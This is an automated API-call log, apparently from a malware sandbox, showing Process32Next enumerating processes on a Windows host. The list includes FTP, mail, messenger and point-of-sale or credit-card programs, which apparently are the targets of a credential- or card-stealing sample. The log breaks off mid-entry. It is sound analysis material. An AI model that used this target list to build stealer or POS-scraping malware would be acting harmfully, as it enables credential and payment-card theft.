Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0223.937] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.938] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.939] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.941] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.943] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.944] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.948] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.950] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0223.952] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0223.953] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0223.955] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0223.956] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.958] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0223.959] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0223.961] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0223.962] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0223.964] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0223.965] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0223.967] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.968] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.970] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0223.972] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0223.973] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0223.975] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0223.976] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x624, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="onlawyerseek.exe")) returned 1 [0223.977] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact believe worker.exe")) returned 1 [0223.979] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="partner.exe")) returned 1 [0223.980] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whole.exe")) returned 1 [0223.982] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nation-choose.exe")) returned 1 [0223.987] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="insteadrecent.exe")) returned 1 [0223.989] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="side-end-death.exe")) returned 1 [0223.990] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="young every moment.exe")) returned 1 [0223.992] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="somethingvictim.exe")) returned 1 [0223.993] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="director_glass_possible.exe")) returned 1 [0223.995] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accept.exe")) returned 1 [0224.038] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ability-where-operation.exe")) returned 1 [0224.039] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="condition.exe")) returned 1 [0224.041] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="executive_anything.exe")) returned 1 [0224.043] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="movement indeed best.exe")) returned 1 [0224.044] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="memberheavy.exe")) returned 1 [0224.045] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gardenpolitical.exe")) returned 1 [0224.047] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="program-him-cell.exe")) returned 1 [0224.049] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1034, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="long_sense.exe")) returned 1 [0224.050] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="agreeinterestingreceive.exe")) returned 1 [0224.052] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x105c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0224.058] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1068, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0224.060] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1074, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0224.063] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0224.065] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0224.078] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0224.080] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0224.083] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0224.084] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0224.086] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0224.088] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0224.090] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0224.092] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0224.096] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0224.098] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0224.101] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0224.103] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x112c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0224.105] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1134, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0224.107] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0224.109] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0224.111] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x114c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0224.113] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0224.115] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x115c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0224.119] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0224.121] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x116c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0224.123] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0224.125] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x117c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0224.127] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0224.128] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x118c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0224.130] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0224.133] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x119c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0224.135] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0224.138] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0224.140] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0224.142] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0224.144] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0224.145] Process32Next (in: hSnapshot=0x1eb8, lppe=0x10a6fe20 | out: lppe=0x10a6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0224.147] Process32Next (in: 